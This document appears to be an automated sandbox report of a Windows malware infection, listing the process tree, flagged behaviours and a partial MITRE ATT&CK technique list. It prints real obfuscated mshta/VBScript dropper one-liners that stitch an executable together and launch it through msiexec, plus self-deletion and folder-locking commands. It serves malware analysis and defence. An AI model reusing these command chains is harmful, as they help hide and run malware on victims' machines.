C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:25⤵PID:7132
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3304 /prefetch:85⤵PID:6852
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3292 /prefetch:85⤵PID:6396
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3748 /prefetch:85⤵PID:9056
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=3744 /prefetch:85⤵PID:996
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,3965572929243588587,7588419148986885021,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5184_460514932" --mojo-platform-channel-handle=2692 /prefetch:85⤵PID:356
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_745A.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵PID:8484
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:888 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7608
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4844 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7336
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6844
-
C:\Users\Admin\AppData\Local\Temp\84EA.exeC:\Users\Admin\AppData\Local\Temp\84EA.exe1⤵PID:8556
-
C:\Users\Admin\AppData\Local\Temp\84EA.exeC:\Users\Admin\AppData\Local\Temp\84EA.exe2⤵PID:8620
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\84EA.exe"C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:8348
-
C:\Users\Admin\AppData\Local\Temp\84EA.exe"C:\Users\Admin\AppData\Local\Temp\84EA.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:8656
-
C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"5⤵PID:8820
-
C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"6⤵PID:9184
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:9128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:8472
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:8116
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\913F.exeC:\Users\Admin\AppData\Local\Temp\913F.exe1⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\9334.exeC:\Users\Admin\AppData\Local\Temp\9334.exe1⤵PID:7984
-
C:\Users\Admin\AppData\Local\Temp\9A0B.exeC:\Users\Admin\AppData\Local\Temp\9A0B.exe1⤵PID:8856
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9A0B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A0B.exe" & del C:\ProgramData\*.dll & exit2⤵PID:8252
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9A0B.exe /f3⤵
- Kills process with taskkill
PID:6136
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6632
-
-
-
C:\Users\Admin\AppData\Local\Temp\A71C.exeC:\Users\Admin\AppData\Local\Temp\A71C.exe1⤵PID:8972
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )2⤵PID:9040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\A71C.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\A71C.exe" ) do taskkill -IM "%~NxN" /f3⤵PID:6744
-
C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXewND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y4⤵PID:4808
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipt:clOSe( creaTEObJecT ("WsCRiPT.sheLL"). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )5⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:3392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f6⤵PID:196
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt:cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ))5⤵PID:8072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D& sTARt msiexec /y .\NXXHJC.d &deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r6⤵PID:8660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "7⤵PID:8772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"7⤵PID:556
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\NXXHJC.d7⤵PID:8844
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "A71C.exe" /f4⤵
- Kills process with taskkill
PID:7148
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AAB7.exeC:\Users\Admin\AppData\Local\Temp\AAB7.exe1⤵PID:8888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5264
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8180
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8696
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4812
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6920
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2108
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6936
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5528
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6984
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt1⤵PID:3896
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt2⤵PID:4932
-
-
C:\Users\Admin\AppData\Roaming\ivhhbvtC:\Users\Admin\AppData\Roaming\ivhhbvt1⤵PID:9104
-
C:\Users\Admin\AppData\Roaming\buhhbvtC:\Users\Admin\AppData\Roaming\buhhbvt1⤵PID:8240
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵PID:7584
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵PID:7556
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4476
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6056
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8196
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{719de96e-a652-534f-b615-c6231f463305}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5624
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:5448
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8416
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6164
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8616
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7892
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:9180
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:4208
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9040
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8228
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6940
-
C:\Users\Admin\AppData\Local\Temp\7124.exeC:\Users\Admin\AppData\Local\Temp\7124.exe1⤵PID:5232
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7124.exe"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\7124.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))2⤵PID:4208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7124.exe"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\7124.exe") do taskkill -iM "%~Nxq" -f3⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw4⤵PID:3880
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))5⤵PID:9032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f6⤵PID:2820
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: ClOSe (creAteObJecT( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q * ",0 , tRUe ) )5⤵PID:4792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = "MZ" > WSyZI.4& coPY /b /y WSYZI.4+ 0CPM7.G+ TY6DSS.SE+ vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q *6⤵PID:7080
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵PID:8236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"7⤵PID:8336
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\UFTH.2~Z7⤵PID:6536
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "7124.exe" -f4⤵
- Kills process with taskkill
PID:5224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\755B.exeC:\Users\Admin\AppData\Local\Temp\755B.exe1⤵PID:4340
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task1⤵PID:8908
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task2⤵PID:1228
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8928
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:8632
-
C:\Users\Admin\AppData\Roaming\ivhhbvtC:\Users\Admin\AppData\Roaming\ivhhbvt1⤵PID:1120
-
C:\Users\Admin\AppData\Roaming\buhhbvtC:\Users\Admin\AppData\Roaming\buhhbvt1⤵PID:9056
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt1⤵PID:1536
-
C:\Users\Admin\AppData\Roaming\tfhhbvtC:\Users\Admin\AppData\Roaming\tfhhbvt2⤵PID:5448
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8456
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3268
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task1⤵PID:2720
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task2⤵PID:1312
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5544
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task1⤵PID:8740
-
C:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exeC:\Users\Admin\AppData\Local\dda661b8-105a-4781-acfe-eaacc6a7695f\84EA.exe --Task2⤵PID:8632
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5488
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1